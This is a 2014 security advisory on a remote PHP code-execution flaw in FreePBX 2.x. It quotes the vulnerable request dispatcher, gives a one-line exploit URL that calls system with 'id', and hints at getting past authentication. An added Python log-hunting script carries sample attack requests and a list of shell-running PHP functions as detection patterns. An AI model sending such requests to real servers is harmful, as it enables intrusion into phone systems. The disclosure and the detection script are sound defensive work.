
FreePBX 2.x Code Execution
Posted Feb 11, 2014
Authored by i-Hmx

FreePBX 2.x suffers from a remote PHP code execution vulnerability due to a poor file validation methodology.

tags | advisory, remote, php, code execution
SHA-256 | 20c5cc704d10be24460de25cdb7eff337ee9976184e28a9640960869ae57d7d7

App : Freepbx 2.x
download : schmoozecom.com
Author : i-Hmx
mail : n0p1337@gmail.com
Home : sec4ever.com , secarrays ltd

Freepbx is a famous Asterisk-based distro used worldwide, and it actually suffers from many vulns.
A simple one is included here just as a "knock knock" for the "schmoozecom" team ;)
Here you will see a damn obvious PHP code execution vuln, which can be upgraded to RCE and also used to dump all of the box's data.
You can have a look if you are interested.

File : admin/libraries/view.functions.php

function fileRequestHandler($handler, $module = false, $file = false){
    global $amp_conf;

    switch ($handler) {
        case 'reload':
            // AJAX handler for reload event
            $response = do_reload();
            header("Content-type: application/json");
            echo json_encode($response);
            break;
        case 'file':
            /** Handler to pass-through file requests
             * Looks for "module" and "file" variables, strips .. and only allows normal filename characters.
             * Accepts only files of the type listed in $allowed_exts below, and sends the corresponding mime-type,
             * and always interprets files through the PHP interpreter. (Most of?) the freepbx environment is available,
             * including $db and $astman, and the user is authenticated.
             */
            if (!$module || !$file) {
                die_freepbx("unknown");
            }
            //TODO: this could probably be more efficient
            $module = str_replace('..','.', preg_replace('/[^a-zA-Z0-9-\_\.]/','',$module));
            $file = str_replace('..','.', preg_replace('/[^a-zA-Z0-9-\_\.]/','',$file));

            $allowed_exts = array(
                '.js' => 'text/javascript',
                '.js.php' => 'text/javascript',
                '.css' => 'text/css',
                '.css.php' => 'text/css',
                '.html.php' => 'text/html',
                '.php' => 'text/html',
                '.jpg.php' => 'image/jpeg',
                '.jpeg.php' => 'image/jpeg',
                '.png.php' => 'image/png',
                '.gif.php' => 'image/gif',
            );
            foreach ($allowed_exts as $ext=>$mimetype) {
                if (substr($file, -1*strlen($ext)) == $ext) {
                    $fullpath = 'modules/'.$module.'/'.$file;
                    if (file_exists($fullpath)) {
                        // file exists, and is allowed extension

                        // image, css, js types - set Expires to 24hrs in advance so the client does
                        // not keep checking for them. Replace from header.php
                        if (!$amp_conf['DEVEL']) {
                            header('Expires: '.gmdate('D, d M Y H:i:s', time() + 86400).' GMT', true);
                            header('Cache-Control: max-age=86400, public, must-revalidate',true);
                        }
                        header("Content-type: ".$mimetype);
                        ob_start();
                        include($fullpath);
                        ob_end_flush();
                        exit();
                    }
                    break;
                }
            }
            die_freepbx("../view/not allowed");
            break;
        case 'api':
            if (isset($_REQUEST['function']) && function_exists($_REQUEST['function'])) {
                $function = $_REQUEST['function'];
                $args = isset($_REQUEST['args'])?$_REQUEST['args']:'';

                //currently works for one arg functions, eventually need to clean this up to except more args
                $result = $function($args);
                $jr = json_encode($result);
            } else {
                $jr = json_encode(null);
            }
            header("Content-type: application/json");
            echo $jr;
            break;
    }
    exit();
}

The function is called from admin/config.php at line 132:

if (!in_array($display, array('noauth', 'badrefer'))
    && isset($_REQUEST['handler'])
) {
    $module = isset($_REQUEST['module']) ? $_REQUEST['module'] : '';
    $file = isset($_REQUEST['file']) ? $_REQUEST['file'] : '';
    fileRequestHandler($_REQUEST['handler'], $module, $file);
    exit();
}

Well, it's easy to exploit to get any PHP function executed, since the 'api' case calls whatever function name the request supplies, with the request's 'args' as its argument.
E.g. system:
config.php?handler=api&function=system&args=id
Usually it requires authentication, but using your mind you can get around it smoothly ;)
That's it.
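As an added defender-side example (not part of the advisory and not FreePBX code), the following Python hunts web-server access logs for requests that reach the dynamic 'api' dispatcher shown above. The log lines and IP addresses are constructed; only the /admin/config.php path and the handler/function/args parameter names come from the advisory.

```python
"""Hunt for requests to the FreePBX 'api' dispatcher in access logs (added example)."""
import re
from urllib.parse import parse_qs, urlsplit

# PHP builtins that hand their argument to a shell; function_exists() accepts
# every one of them, so the dispatcher will call them without complaint.
SHELL_BUILTINS = {"system", "exec", "passthru", "shell_exec", "popen", "proc_open"}

# Common Log Format: client ip, request line, status code.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')

# Constructed sample log (not real traffic). Line 2 percent-encodes the function
# name, line 5 carries its parameters in an unlogged POST body.
SAMPLE_LOG = """\
203.0.113.7 - - [11/Feb/2014:10:15:02 +0000] "GET /admin/config.php?handler=api&function=system&args=id HTTP/1.1" 200 512
203.0.113.7 - - [11/Feb/2014:10:15:09 +0000] "GET /admin/config.php?handler=api&function=%53ystem&args=hostname HTTP/1.1" 200 640
198.51.100.4 - - [11/Feb/2014:10:16:00 +0000] "GET /admin/config.php?display=extensions HTTP/1.1" 200 9001
198.51.100.4 - - [11/Feb/2014:10:16:30 +0000] "GET /admin/config.php?handler=file&module=core&file=style.css HTTP/1.1" 200 3002
203.0.113.7 - - [11/Feb/2014:10:17:45 +0000] "POST /admin/config.php?handler=api HTTP/1.1" 200 77
""".splitlines()


def find_api_calls(lines):
    """Return one record per request that selects handler=api on config.php."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/admin/config.php"):
            continue
        # parse_qs percent-decodes, so an encoded name is normalised before
        # matching; PHP function names are case-insensitive, hence lower().
        qs = parse_qs(url.query, keep_blank_values=True)
        if qs.get("handler", [""])[0] != "api":
            continue
        func = qs.get("function", [""])[0].lower()
        hits.append({
            "ip": ip,
            "function": func,   # empty: parameters came via POST body or cookie
            "args": qs.get("args", [""])[0],
            "status": int(status),
            "shell": func in SHELL_BUILTINS,
        })
    return hits


if __name__ == "__main__":
    for h in find_api_calls(SAMPLE_LOG):
        print("ALERT " if h["shell"] else "review", h["ip"], repr(h["function"]), repr(h["args"]))
```

Because $_REQUEST also reads POST bodies and cookies, which the access log does not record, every handler=api record with an empty function still needs review against application-level logs.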

Solution?
Of course I would never leave you in sec nightmares: just modify your firewall rules and don't leave your box exposed to the nasty internet world :D

Can you sleep well now?
Of course not, you may already be compromised and also backdoored with a super tiny PHP backdoor, so you'd better remove all PHP data,
download the latest upgrade from schmoozecom, reboot your box and you are safe . . (temporarily) ;)

Have a good day

./Faris <The Awsome>